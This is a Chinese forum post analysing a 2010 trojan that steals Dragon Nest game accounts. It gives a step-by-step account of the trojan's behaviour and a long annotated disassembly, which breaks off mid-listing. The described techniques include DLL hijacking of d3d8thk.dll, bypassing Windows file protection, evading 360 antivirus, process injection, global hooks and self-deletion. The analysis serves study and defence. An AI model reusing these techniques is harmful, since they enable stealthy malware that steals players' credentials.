病毒的时间戳是08/13/2010
逆了木马主体所有函数,释放出的bin没有看,放全局消息钩子来截获信息。
代码中有很多填充内容的部分,繁琐无味,我帖的时候去除了这些无意义代码。
病毒样本已经在四楼上传。有对bin感兴趣的朋友不妨看看
这个病毒自身验证的过程我之前的一个帖子说了:
传送门~
http://bbs.pediy.com/showthread.php?t=119736
先看说明,再看代码~
1,从自身提取一个名为"MWAI"的资源,并释放到系统临时文件夹中,名称为kb****.bin (*的是0~9的随即数字)。
2,接着进行自身验证,通过比较当前进程文件的最后8位是否为7001000000010000来判断木马是否完整(
比如脱壳的版本~因为这个木马用的PEcompect壳,可以用脱壳机直接脱掉),如果验证通过,则提取当前
木马文件的后0x170个字节内容追加到刚刚释放的bin文件中,来完成bin文件的组装。
3,先在"SOFTWARE\snda\dn"中找游戏路径,如果没找到,则
到"Software\Microsoft\Windows\ShellNoRoam\MUICache"中寻找
4,删除游戏目录下的mfc42.log文件
5,把释放出的bin复制一份到系统目录\system下并修改后缀为axs,并设置隐藏属性
6,LoadLibrary加载释放出的bin,并调用其LoadDll函数,安装全局WH_GETMESSAGE钩子
7,复制释放的bin到游戏目录下,并命名为mfc42.log,设置隐藏属性
8,判断"系统目录\DllCache"下和"系统目录\system\"下是否存在"d3d8thk.dll"文件,如果存在则备份
到"系统目录\d3d8thk.dll.dat"
9,打开"系统目录\d3d8thk.dll.dat"读取该PE文件各部分信息存放到一自定义结构体,一个buffer局部
变量指针,一个sections指针数组中,结构体说明如下:
[esi] = buffer
存放pe文件指针
[esi+8] = IMAGE_DOS_HEADER
[esi+c] = dos stub
[esi+10] = dos stub大小
[esi+14] = 0x40(IMAGE_DOS_HEADER大小)
[esi+18] = IMAGE_NT_HEADER
[esi+1c] = 第一个IMAGE_SECTION_HEADER结构
[esi+20] = 第二个
依次类推~
struct _PEINFO{
LPCSTR lpImage_Dos_Header;
LPCSTR lpImage_Dos_Stub;
int iSizeOfDosStub;
int iSizeOfDosHeader;
LPCSTR lpImage_Nt_Header;
LPCSTR lpImage_Section_Header[0x10]
}
[esi+1c+50] 中保存着各个SECTIONS的数据指针
+4 依次类推~
LPCSTR lpSections[0x10];
10,在该"系统目录\d3d8thk.dll.dat"文件中搜索分别搜索".code"和"text"节,复制自身的0x00407034
位置的357个字节内容到目标section头,判断目标section的offset0x164处的值,如果正确写入了数据,
则该处的数据应该为0x9090,然后在目标section中继续搜索"246",在其后面填充内容"kb****.axs",在
"246"前填充一个0x70(ascii的p)。
11,把修改后的"系统目录\d3d8thk.dll.dat"写回。
12,复制"系统目录\d3d8thk.dll.dat" 到 "游戏目录\d3d8thk.dll"
13,移动"系统目录\system\d3d8thk.dll"到"系统目录\system\d3d8thk.dll.****(4个随即大写字符)"
,然后马上删除"系统目录\system\d3d8thk.dll.****(4个随即大写字符)"。移动"系统目录
\d3d8thk.dll"到"系统目录\d3d8thk.dll.****(4个随即大写字符)"
14,判断"系统目录\DllCache\d3d8thk.dll"是否存在,如果存在,检测是否存在360,如果存在,则利用
技巧躲避360的api调用检查来调用sfc_os.dll5号函数,从而修改系统文件。如果没有360,则依次检
查"conime.exe","IEXPLORER.EXE","ctfmon.exe","explorer.exe"进程,如果其中一个进程存在,则注入
该进程,并执行指定代码,进行提权和执行5号函数,并移动"系统目录\DllCache\d3d8thk.dll",但这个地方比较有趣,就是实际上如果没有360的话,这个操作无法成功,因为在注入远程进程中的代码中存在bug,无法完成系统函数移动的操作,具体请看代码。
15,移动"系统目录\DllCache\d3d8thk.dll"到"系统目录\DllCache\d3d8thk.dll.****(4个随即大写字
符)"
16,复制"系统目录\d3d8thk.dll.dat"到"系统目录\system\d3d8thk.dll.dat"
17,"系统目录\system\d3d8thk.dll.dat"改名为"系统目录\system\d3d8thk.dll"
18,复制文件"系统目录\d3d8thk.dll.dat"到"系统目录\DllCache\d3d8thk.dll"
19,删除在临时文件夹中释放出的bin文件
20,获取环境变量"TEMP"中的临时文件路径,并在其目录下创建名为"临时文件路径\tempVidio.bat"的批处理文件,并执行该文件,执行操作:删除病毒本身,然后删除批处理本身。
【第零段】
在当前系统中寻找dnlauncher.exe和DragonNest.exe 游戏进程,如果发现则关闭进程
代码:
00402C75 /$ 55 push ebp 00402C76 |. 8BEC mov ebp, esp 00402C78 |. 83EC 34 sub esp, 34 00402C7B |. 32C0 xor al, al 00402C7D |. 6A 01 push 1 00402C7F |. 8845 FE mov byte ptr [ebp-2], al 00402C82 |. 8845 EE mov byte ptr [ebp-12], al 00402C85 |. 8845 DC mov byte ptr [ebp-24], al 00402C88 |. 8D45 CC lea eax, dword ptr [ebp-34] 00402C8B |. 50 push eax 00402C8C |. C645 F0 64 mov byte ptr [ebp-10], 64 00402C90 |. C645 F1 6E mov byte ptr [ebp-F], 6E 00402C94 |. C645 F2 6C mov byte ptr [ebp-E], 6C 00402D38 |. C645 DB 65 mov byte ptr [ebp-25], 65 00402D3C |. E8 0CE6FFFF call 0040134D ; 提权操作 00402D41 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; eax = "dnlauncher.exe" 00402D44 |. 50 push eax ; 压入龙之谷游戏进程"dnlauncher.exe" 00402D45 |. E8 B6E2FFFF call 00401000 ; 寻找龙之谷进程"dnlauncher.exe"信息 如果找到则返回龙之谷进程ID,否则返回0 00402D4A |. 50 push eax 00402D4B |. E8 B7E4FFFF call 00401207 ; 关闭龙之谷进程 00402D50 |. 8D45 E0 lea eax, dword ptr [ebp-20] ; eax = "DragonNest.exe" 00402D53 |. 50 push eax 00402D54 |. E8 A7E2FFFF call 00401000 ; 寻找龙之谷进程"DragonNest.exe"信息 如果找到则返回龙之谷进程ID,否则返回0 00402D59 |. 50 push eax 00402D5A |. E8 A8E4FFFF call 00401207 ; 关闭找到的进程 00402D5F |. 83C4 18 add esp, 18 00402D62 |. 6A 50 push 50 ; /Timeout = 80. ms 00402D64 |. FF15 1C604000 call dword ptr [<&kernel32.Sleep>] ; \睡眠50ms 00402D6A |. C9 leave 00402D6B \. C3 retn
核心过程:
代码:
00402D6C /$ 55 push ebp 00402D6D |. 8BEC mov ebp, esp 00402D6F |. 81EC 04090000 sub esp, 904 ; 分配0x904大小的栈空间 00402D75 |. 53 push ebx 00402D76 |. 56 push esi 00402D77 |. 57 push edi 00402D78 |. 6A 40 push 40 00402D7A |. 5A pop edx ; edx = 0x40 00402D7B |. 33DB xor ebx, ebx ; ebx = 0 00402D7D |. 8BCA mov ecx, edx 00402D7F |. 33C0 xor eax, eax ; eax = 0 00402D81 |. 8DBD 11FCFFFF lea edi, dword ptr [ebp-3EF] ; edi = 栈空间指针 00402D87 |. 889D 10FCFFFF mov byte ptr [ebp-3F0], bl ; 在edi前面填充一个0 00402D8D |. F3:AB rep stos dword ptr es:[edi] ; 在ebp-3ef中填充0x40个DWORD 0 00402D8F |. 66:AB stos word ptr es:[edi] ; 再添加一个字的0 00402D91 |. AA stos byte ptr es:[edi] ; 继续添加一个byte 的0 00402D92 |. 8BCA mov ecx, edx ; ecx = 0x40 00402D94 |. 33C0 xor eax, eax 00402D96 |. 8DBD 05F9FFFF lea edi, dword ptr [ebp-6FB] ; 同上,只是栈指针不同,都是填充了100个byte的0到栈中 00402D9C |. 889D 04F9FFFF mov byte ptr [ebp-6FC], bl 00402DA2 |. F3:AB rep stos dword ptr es:[edi] 00402DA4 |. 66:AB stos word ptr es:[edi] 00402DA6 |. AA stos byte ptr es:[edi] 00402DA7 |. 8BCA mov ecx, edx 00402E0F |. C645 B4 4B mov byte ptr [ebp-4C], 4B ; 给局部字符串数组填充内容"kernel32.dll" 00402E82 |. 8D45 AC lea eax, dword ptr [ebp-54] 00402E85 |. 6A 75 push 75 00402E87 |. 50 push eax ; 把ebp-54的栈指针压入 00402E88 |. C685 5CFFFFFF 53 mov byte ptr [ebp-A4], 53 00402E8F |. FF75 0C push dword ptr [ebp+C] ; 压入第三个参数,既堆空间指针 00402E92 |. C685 5DFFFFFF 4F mov byte ptr [ebp-A3], 4F ; 填充内容"SOFTWARE\snda\dn" 00402E99 |. C685 5EFFFFFF 46 mov byte ptr [ebp-A2], 46 00402EA0 |. C685 5FFFFFFF 54 mov byte ptr [ebp-A1], 54 00402EA7 |. C685 60FFFFFF 57 mov byte ptr [ebp-A0], 57 00402EAE |. C685 61FFFFFF 41 mov byte ptr [ebp-9F], 41 00402EB5 |. C685 62FFFFFF 52 mov byte ptr [ebp-9E], 52 00402EBC |. C685 63FFFFFF 45 mov byte ptr [ebp-9D], 45 00402EC3 |. C685 64FFFFFF 5C mov byte ptr [ebp-9C], 5C 00402ECA |. C685 65FFFFFF 73 mov byte ptr [ebp-9B], 73 00402ED1 |. C685 66FFFFFF 6E mov byte ptr [ebp-9A], 6E 00402ED8 |. C685 67FFFFFF 64 mov byte ptr [ebp-99], 64 00402EDF |. C685 68FFFFFF 61 mov byte ptr [ebp-98], 61 00402EE6 |. C685 69FFFFFF 5C mov byte ptr [ebp-97], 5C 00402EED |. C685 6AFFFFFF 64 mov byte ptr [ebp-96], 64 00402EF4 |. C685 6BFFFFFF 6E mov byte ptr [ebp-95], 6E 00402EFB |. 889D 6CFFFFFF mov byte ptr [ebp-94], bl 00402F01 |. C645 A4 6C mov byte ptr [ebp-5C], 6C ; 填充内容"loader" 00402F05 |. C645 A5 6F mov byte ptr [ebp-5B], 6F 00402F09 |. C645 A6 61 mov byte ptr [ebp-5A], 61 00402F0D |. C645 A7 64 mov byte ptr [ebp-59], 64 00402F11 |. C645 A8 65 mov byte ptr [ebp-58], 65 00402F15 |. C645 A9 72 mov byte ptr [ebp-57], 72 00402F19 |. 885D AA mov byte ptr [ebp-56], bl 00402F1C |. C685 70FFFFFF 5C mov byte ptr [ebp-90], 5C ; 填充内容"\DNLauncher.exe" 00402F23 |. C685 71FFFFFF 44 mov byte ptr [ebp-8F], 44 00402F2A |. C685 72FFFFFF 4E mov byte ptr [ebp-8E], 4E 00402F31 |. C685 73FFFFFF 4C mov byte ptr [ebp-8D], 4C 00402F38 |. C685 74FFFFFF 61 mov byte ptr [ebp-8C], 61 00402F3F |. C685 75FFFFFF 75 mov byte ptr [ebp-8B], 75 00402F46 |. C685 76FFFFFF 6E mov byte ptr [ebp-8A], 6E 00402F4D |. C685 77FFFFFF 63 mov byte ptr [ebp-89], 63 00402F54 |. C685 78FFFFFF 68 mov byte ptr [ebp-88], 68 00402F5B |. C685 79FFFFFF 65 mov byte ptr [ebp-87], 65 00402F62 |. C685 7AFFFFFF 72 mov byte ptr [ebp-86], 72 00402F69 |. C685 7BFFFFFF 2E mov byte ptr [ebp-85], 2E 00402F70 |. C685 7CFFFFFF 65 mov byte ptr [ebp-84], 65 00402F77 |. C685 7DFFFFFF 78 mov byte ptr [ebp-83], 78 00402F7E |. C685 7EFFFFFF 65 mov byte ptr [ebp-82], 65 00402F85 |. 889D 7FFFFFFF mov byte ptr [ebp-81], bl 00402F8B |. C645 AC 57 mov byte ptr [ebp-54], 57 ; 填充内容"WMAT" 00402F8F |. C645 AD 4D mov byte ptr [ebp-53], 4D 00402F93 |. C645 AE 41 mov byte ptr [ebp-52], 41 00402F97 |. C645 AF 54 mov byte ptr [ebp-51], 54 00402F9B |. 885D B0 mov byte ptr [ebp-50], bl 00402F9E |. E8 62F6FFFF call 00402605 ; 在系统临时文件目录中释放一个名称为kb****.bin 的文件,其中*为0~9的随即数字 00402FA3 |. 83C4 0C add esp, 0C 00402FA6 |. 85C0 test eax, eax ; 释放成功则返回TRUE否则返回FALSE 00402FA8 |. 74 09 je short 00402FB3 ; 判断文件是否释放成功,失败则跳转 00402FAA |. FF75 0C push dword ptr [ebp+C] ; 压入刚刚释放的文件路径 00402FAD |. E8 7CFAFFFF call 00402A2E ; 这个函数还是有点意思,他首先对自身进行验证,通过特征码来判断当前文件是否被脱壳了,如果没脱壳,则进行组装,从病毒原体中提取最后的0x170个字节然后写入刚刚创建的bin文件的结尾 00402FB2 |. 59 pop ecx ; ecx = 文件绝对路径 00402FB3 |> FF75 0C push dword ptr [ebp+C] ; 压入刚刚释放的文件路径 00402FB6 |. E8 74E7FFFF call 0040172F ; 返回绝对路径的长度strlen 00402FBB |. 85C0 test eax, eax ; 测试返回值是否为0 00402FBD |. 59 pop ecx ; ecx = 文件绝对路径 00402FBE |. 0F84 1E050000 je 004034E2 ; 返回0,则跳转 00402FC4 |. 8B35 00604000 mov esi, dword ptr [<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA 00402FCA |. 8D45 8C lea eax, dword ptr [ebp-74] ; eax = CopyFileA 00402FCD |. 50 push eax 00402FCE |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; eax = Kernel32.dll 00402FD1 |. 50 push eax ; /FileName 00402FD2 |. FFD6 call esi ; \LoadLibraryA Kernel32.dll 00402FD4 |. 50 push eax ; 压入kernel32.dll的HMODULE 00402FD5 |. E8 57E9FFFF call 00401931 ; GetProcAddress 获取CopyFileA函数地址 00402FDA |. 8985 58FFFFFF mov dword ptr [ebp-A8], eax ; 把CopyFileA函数地址传到局部空间中保存 00402FE0 |. 8D85 70FFFFFF lea eax, dword ptr [ebp-90] ; eax = "DNLauncher.exe" 00402FE6 |. 50 push eax 00402FE7 |. 8D45 A4 lea eax, dword ptr [ebp-5C] ; eax = "loader" 00402FEA |. 50 push eax 00402FEB |. 8D85 5CFFFFFF lea eax, dword ptr [ebp-A4] ; eax = "SOFTWARE\snda\dn" 00402FF1 |. 50 push eax 00402FF2 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] 00402FF8 |. 68 02000080 push 80000002 ; 权限值 00402FFD |. 50 push eax ; 缓冲区buffer,用于保存游戏绝对路径 00402FFE |. C645 98 6D mov byte ptr [ebp-68], 6D 00403002 |. C645 99 66 mov byte ptr [ebp-67], 66 00403006 |. C645 9A 63 mov byte ptr [ebp-66], 63 0040300A |. C645 9B 34 mov byte ptr [ebp-65], 34 0040300E |. C645 9C 32 mov byte ptr [ebp-64], 32 00403012 |. C645 9D 2E mov byte ptr [ebp-63], 2E 00403016 |. C645 9E 6C mov byte ptr [ebp-62], 6C 0040301A |. C645 9F 6F mov byte ptr [ebp-61], 6F 0040301E |. C645 A0 67 mov byte ptr [ebp-60], 67 00403022 |. 885D A1 mov byte ptr [ebp-5F], bl 00403025 |. C645 80 44 mov byte ptr [ebp-80], 44 ; 填充"DeleteFileA" 00403029 |. C645 81 65 mov byte ptr [ebp-7F], 65 0040302D |. C645 82 6C mov byte ptr [ebp-7E], 6C 00403031 |. C645 83 65 mov byte ptr [ebp-7D], 65 00403035 |. C645 84 74 mov byte ptr [ebp-7C], 74 00403039 |. C645 85 65 mov byte ptr [ebp-7B], 65 0040303D |. C645 86 46 mov byte ptr [ebp-7A], 46 00403041 |. C645 87 69 mov byte ptr [ebp-79], 69 00403045 |. C645 88 6C mov byte ptr [ebp-78], 6C 00403049 |. C645 89 65 mov byte ptr [ebp-77], 65 0040304D |. C645 8A 41 mov byte ptr [ebp-76], 41 00403051 |. 885D 8B mov byte ptr [ebp-75], bl 00403054 |. E8 63EEFFFF call 00401EBC ; 先在"SOFTWARE\snda\dn"中找游戏路径,如果没找到,则到"Software\Microsoft\Windows\ShellNoRoam\MUICache"中寻找,找到返回1,失败返回0 00403059 |. 83C4 1C add esp, 1C ; 堆栈平衡 0040305C |. 85C0 test eax, eax ; 判断是否找到 0040305E |. 0F84 F7000000 je 0040315B ; 如果没找到游戏路径,则跳转 00403064 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] ; eax = 游戏路径 0040306A |. C645 E2 5C mov byte ptr [ebp-1E], 5C 0040306E |. 50 push eax ; /游戏文件路径 0040306F |. 885D E3 mov byte ptr [ebp-1D], bl ; | 00403072 |. E8 7F220000 call <jmp.&MSVCRT.strlen> ; \strlen 00403077 |. 80BC05 13FDFFFF 5C cmp byte ptr [ebp+eax-2ED], 5C ; 查看路径是否以"\"结尾 0040307F |. 59 pop ecx 00403080 |. 74 12 je short 00403094 ; 如果路径是以"\"结尾,则直接strcat"mfc43.log",否则先在最后添加"\" 00403082 |. 8D45 E2 lea eax, dword ptr [ebp-1E] 00403085 |. 50 push eax 00403086 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] 0040308C |. 50 push eax 0040308D |. E8 B3E6FFFF call 00401745 ; strcat "\" 00403092 |. 59 pop ecx 00403093 |. 59 pop ecx 00403094 |> 8D45 98 lea eax, dword ptr [ebp-68] ; "mfc43.log" 00403097 |. 50 push eax 00403098 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] 0040309E |. 50 push eax 0040309F |. E8 A1E6FFFF call 00401745 ; strcat "mfc43.log" 生成绝对路径 004030A4 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] 004030AA |. 50 push eax ; eax = 游戏目录 004030AB |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] 004030B1 |. 50 push eax 004030B2 |. E8 97E5FFFF call 0040164E ; strcpy 把游戏目录存入ebp-3F0 004030B7 |. 8D85 14FDFFFF lea eax, dword ptr [ebp-2EC] 004030BD |. 50 push eax 004030BE |. 8D85 00F8FFFF lea eax, dword ptr [ebp-800] 004030C4 |. 50 push eax 004030C5 |. E8 84E5FFFF call 0040164E ; strcpy 把游戏目录存入ebp-800 004030CA |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] 004030D0 |. 50 push eax 004030D1 |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] 004030D7 |. 50 push eax 004030D8 |. E8 68E6FFFF call 00401745 ; strcat 生成目录游戏目录\mfc42.log 004030DD |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] ; 游戏目录\mfc42.log 004030E3 |. C745 C4 01000000 mov dword ptr [ebp-3C], 1 004030EA |. 50 push eax ; 游戏目录\mfc42.log 004030EB |. E8 7FE6FFFF call 0040176F ; 判断指定文件是否存在,失败返回0 004030F0 |. 83C4 24 add esp, 24 ; 堆栈平衡 004030F3 |. 85C0 test eax, eax 004030F5 |. 74 32 je short 00403129 ; 如果文件不存在,则跳转 004030F7 |. 8D45 80 lea eax, dword ptr [ebp-80] ; DeleteFileA 004030FA |. 50 push eax 004030FB |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 004030FE |. 50 push eax 004030FF |. FFD6 call esi ; LoadLibraryA 00403101 |. 50 push eax 00403102 |. E8 2AE8FFFF call 00401931 ; GetProAddress DeleteFileA 00403107 |. 59 pop ecx 00403108 |. 8BF8 mov edi, eax ; edi = DeleteFileA的地址 0040310A |. 59 pop ecx 0040310B |. 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] 00403111 |. 50 push eax ; 游戏目录\mfc42.log 00403112 |. FFD7 call edi ; DeleteFileA 00403114 |. 85C0 test eax, eax 00403116 |. 75 03 jnz short 0040311B ; 如果删除失败则跳转 00403118 |. 895D C4 mov dword ptr [ebp-3C], ebx ; ebp-3c = 0 0040311B |> 8D85 04F9FFFF lea eax, dword ptr [ebp-6FC] ; eax = mfc42.log 文件绝对路径 00403121 |. 50 push eax 00403122 |. FFD7 call edi ; DeleteFileA 00403124 |. 395D C4 cmp dword ptr [ebp-3C], ebx 00403127 |. 74 32 je short 0040315B ; 如果成功删除则跳转 00403129 |> 8D85 10FCFFFF lea eax, dword ptr [ebp-3F0] 0040312F |. 50 push eax ; eax = mfc42.log 文件绝对路径 00403130 |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] 00403136 |. 50 push eax ; buffer 00403137 |. E8 12E5FFFF call 0040164E ; strcpy 0040313C |. 8D85 04F9FFFF lea eax, dword ptr [ebp-6FC] ; eax = mfc42.log 文件绝对路径 00403142 |. 50 push eax 00403143 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4] 00403149 |. 50 push eax 0040314A |. E8 FFE4FFFF call 0040164E ; strcpy 0040314F |. 83C4 10 add esp, 10 00403152 |. 395D C4 cmp dword ptr [ebp-3C], ebx 00403155 |. 0F85 1E010000 jnz 00403279 0040315B |> 6A 0E push 0E 0040315D |. 33C0 xor eax, eax 0040315F |. 59 pop ecx ; ecx = 0x0E 00403160 |. 8DBD 1DFFFFFF lea edi, dword ptr [ebp-E3] 00403166 |. 889D 1CFFFFFF mov byte ptr [ebp-E4], bl 0040316C |. 6A 5C push 5C ; "\" 0040316E |. F3:AB rep stos dword ptr es:[edi] ; 填充0x0E个DWORD0 00403170 |. FF75 0C push dword ptr [ebp+C] ; 释放的bin的文件路径 00403173 |. C645 DC 5C mov byte ptr [ebp-24], 5C ; 填充"\system\" 00403177 |. 66:AB stos word ptr es:[edi] 00403179 |. AA stos byte ptr es:[edi] 0040317A |. C645 DD 73 mov byte ptr [ebp-23], 73 0040317E |. C645 DE 79 mov byte ptr [ebp-22], 79 00403182 |. C645 DF 73 mov byte ptr [ebp-21], 73 00403186 |. C645 E0 74 mov byte ptr [ebp-20], 74 0040318A |. C645 E1 65 mov byte ptr [ebp-1F], 65 0040318E |. C645 E2 6D mov byte ptr [ebp-1E], 6D 00403192 |. C645 E3 5C mov byte ptr [ebp-1D], 5C 00403196 |. 885D E4 mov byte ptr [ebp-1C], bl 00403199 |. E8 88E4FFFF call 00401626 ; strrchr 反方向查询字符第一次出现时的指针位置 0040319E |. 8BF8 mov edi, eax ; edi = 最后一个"\"的位置 004031A0 |. 47 inc edi ; edi ++ 004031A1 |. 57 push edi ; 指向文件名 004031A2 |. E8 88E5FFFF call 0040172F ; strlen 004031A7 |. 83E8 03 sub eax, 3 ; eax = 文件名长度-3 004031AA |. 50 push eax ; /maxlen 004031AB |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4] ; | 004031B1 |. 57 push edi ; |src 004031B2 |. 50 push eax ; |dest 004031B3 |. FF15 54604000 call dword ptr [<&MSVCRT.strncpy>] ; \strncpy 004031B9 |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4] 004031BF |. 68 28704000 push 00407028 ; ASCII "axs" 004031C4 |. 50 push eax 004031C5 |. E8 7BE5FFFF call 00401745 ; strcat 生成一个与刚刚释放的bin同名的axs后缀的文件名 004031CA |. 8D85 1CFFFFFF lea eax, dword ptr [ebp-E4] ; kb****.axs 004031D0 |. 50 push eax 004031D1 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] 004031D7 |. 50 push eax 004031D8 |. E8 71E4FFFF call 0040164E ; strcpy 004031DD |. 83C4 28 add esp, 28 ; 堆栈平衡 004031E0 |. 8D45 E8 lea eax, dword ptr [ebp-18] 004031E3 |. C645 E8 47 mov byte ptr [ebp-18], 47 ; 填充"GetWindowsDirectoryA" 004031E7 |. C645 E9 65 mov byte ptr [ebp-17], 65 004031EB |. 50 push eax 004031EC |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 004031EF |. 50 push eax 004031F0 |. C645 EA 74 mov byte ptr [ebp-16], 74 004031F4 |. C645 EB 57 mov byte ptr [ebp-15], 57 004031F8 |. C645 EC 69 mov byte ptr [ebp-14], 69 004031FC |. C645 ED 6E mov byte ptr [ebp-13], 6E 00403200 |. C645 EE 64 mov byte ptr [ebp-12], 64 00403204 |. C645 EF 6F mov byte ptr [ebp-11], 6F 00403208 |. C645 F0 77 mov byte ptr [ebp-10], 77 0040320C |. C645 F1 73 mov byte ptr [ebp-F], 73 00403210 |. C645 F2 44 mov byte ptr [ebp-E], 44 00403214 |. C645 F3 69 mov byte ptr [ebp-D], 69 00403218 |. C645 F4 72 mov byte ptr [ebp-C], 72 0040321C |. C645 F5 65 mov byte ptr [ebp-B], 65 00403220 |. C645 F6 63 mov byte ptr [ebp-A], 63 00403224 |. C645 F7 74 mov byte ptr [ebp-9], 74 00403228 |. C645 F8 6F mov byte ptr [ebp-8], 6F 0040322C |. C645 F9 72 mov byte ptr [ebp-7], 72 00403230 |. C645 FA 79 mov byte ptr [ebp-6], 79 00403234 |. C645 FB 41 mov byte ptr [ebp-5], 41 00403238 |. 885D FC mov byte ptr [ebp-4], bl 0040323B |. FFD6 call esi ; LoadLibraryA 0040323D |. 50 push eax 0040323E |. E8 EEE6FFFF call 00401931 ; GetProcAddress GetWindowsDirectoryA 00403243 |. 59 pop ecx 00403244 |. 59 pop ecx 00403245 |. 8D8D 18FEFFFF lea ecx, dword ptr [ebp-1E8] 0040324B |. 68 04010000 push 104 ; MAX_PATH 00403250 |. 51 push ecx ; buffer 用以接受系统目录 00403251 |. FFD0 call eax ; GetWindowsDirectoryA 00403253 |. 8D45 DC lea eax, dword ptr [ebp-24] ; "\system\" 00403256 |. 50 push eax 00403257 |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; 系统目录 0040325D |. 50 push eax 0040325E |. E8 E2E4FFFF call 00401745 ; strcat 生成目录windows\system\ 00403263 |. 8D85 08FAFFFF lea eax, dword ptr [ebp-5F8] ; kb****.axs 00403269 |. 50 push eax 0040326A |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; 目录windows\system\ 00403270 |. 50 push eax 00403271 |. E8 CFE4FFFF call 00401745 ; strcat 连接成kb****.axs的绝对路径 00403276 |. 83C4 10 add esp, 10 00403279 |> 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; 目录windows\system\kb****.axs 0040327F |. 50 push eax 00403280 |. E8 AAE4FFFF call 0040172F ; strlen 00403285 |. 85C0 test eax, eax 00403287 |. 59 pop ecx 00403288 |. 0F84 2F010000 je 004033BD ; 函数返回0,则跳转 0040328E |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; 目录windows\system\kb****.axs 00403294 |. 53 push ebx 00403295 |. 50 push eax ; 目录windows\system\kb****.axs 00403296 |. FF75 0C push dword ptr [ebp+C] ; 释放出的bin的绝对路径 00403299 |. FF95 58FFFFFF call dword ptr [ebp-A8] ; CopyFileA 复制释放的bin 到系统目录system中一份 0040329F |. 85C0 test eax, eax 004032A1 |. 0F84 16010000 je 004033BD 004032A7 |. 395D C4 cmp dword ptr [ebp-3C], ebx 004032AA |. 0F84 D7000000 je 00403387 ; 如果复制失败则跳转 004032B0 |. 8D45 C8 lea eax, dword ptr [ebp-38] 004032B3 |. C645 C8 47 mov byte ptr [ebp-38], 47 ; 填充GetFileAttributesA 004032B7 |. 50 push eax ; GetFileAttributesA 004032B8 |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 004032BB |. 50 push eax 0040334B |. 885D FA mov byte ptr [ebp-6], bl 0040334E |. FFD6 call esi ; LoadLibraryA kernel32.dll 00403350 |. 50 push eax 00403351 |. E8 DBE5FFFF call 00401931 ; GetProcAddress GetFileAttributesA 00403356 |. 59 pop ecx 00403357 |. 8BF8 mov edi, eax ; edi = GetFileAttributesA的地址 00403359 |. 59 pop ecx 0040335A |. 8D45 E8 lea eax, dword ptr [ebp-18] ; SetFileAttributesA 0040335D |. 50 push eax 0040335E |. 8D45 B4 lea eax, dword ptr [ebp-4C] ; kernel32.dll 00403361 |. 50 push eax 00403362 |. FFD6 call esi ; LoadLibraryA 00403364 |. 50 push eax 00403365 |. E8 C7E5FFFF call 00401931 ; GetProcAddress SetFileAttributesA 0040336A |. 59 pop ecx 0040336B |. 8945 E0 mov dword ptr [ebp-20], eax 0040336E |. 59 pop ecx 0040336F |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] ; 目录windows\system\kb****.axs 00403375 |. 50 push eax 00403376 |. FFD7 call edi ; GetFileAttributesA 00403378 |. 0C 02 or al, 2 ; 修改文件属性为FILE_ATTRIBUTE_HIDDEN 0040337A |. 50 push eax ; 添加了隐藏的文件属性 0040337B |. 8D85 18FEFFFF lea eax, dword ptr [ebp-1E8] 00403381 |. 50 push eax ; 目录windows\system\kb****.axs 00403382 |. FF55 E0 call dword ptr [ebp-20] ; SetFileAttributesA 00403385 |. EB 36 jmp short 004033BD 00403387 |> FF75 0C push dword ptr [ebp+C] 0040338A |. C645 DC 4C mov byte ptr [ebp-24], 4C ; LoadDll 0040338E |. C645 DD 6F mov byte ptr [ebp-23], 6F 00403392 |. C645 DE 61 mov byte ptr [ebp-22], 61 00403396 |. C645 DF 64 mov byte ptr [ebp-21], 64 0040339A |. C645 E0 44 mov byte ptr [ebp-20], 44 0040339E |. C645 E1 6C mov byte ptr [ebp-1F], 6C 004033A2 |. C645 E2 6C mov byte ptr [ebp-1E], 6C 004033A6 |. 885D E3 mov byte ptr [ebp-1D], bl 004033A9 |. FFD6 call esi ; LoadLibraryA 加载释放出的bin 004033AB |. 8D4D DC lea ecx, dword ptr [ebp-24] 004033AE |. 51 push ecx ; LoadDll 004033AF |. 50 push eax 004033B0 |. E8 7CE5FFFF call 00401931 ; GetProcAddress kb****.bin LoadDll 004033B5 |. 59 pop ecx 004033B6 |. 3BC3 cmp eax, ebx ; 判断LoadDll函数地址是否获取成功 004033B8 |. 59 pop ecx 004033B9 |. 74 02 je short 004033BD ; 如果获取失败,则跳转 004033BB |. FFD0 call eax ; Call LoadDll 004033BD |> 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4] 004033C3 |. 50 push eax ; mfc42.log 文件绝对路径 004033C4 |. E8 66E3FFFF call 0040172F ; strlen 004033C9 |. 85C0 test eax, eax 004033CB |. 59 pop ecx 004033CC |. 0F84 F5000000 je 004034C7 ; 返回0则跳转 004033D2 |. 8D85 0CFBFFFF lea eax, dword ptr [ebp-4F4] 004033D8 |. 53 push ebx 004033D9 |. 50 push eax ; mfc42.log 文件绝对路径 004033DA |. FF75 0C push dword ptr [ebp+C] ; 载释放出的bin的绝对路径 004033DD |. FF95 58FFFFFF call dword ptr [ebp-A8] ; CopyFileA 复制释放的bin到游戏目录下,并命名为mfc42.log 004033E3 |. 85C0 test eax, eax 004033E5 |. 0F84 DC000000 je 004034C7 ; 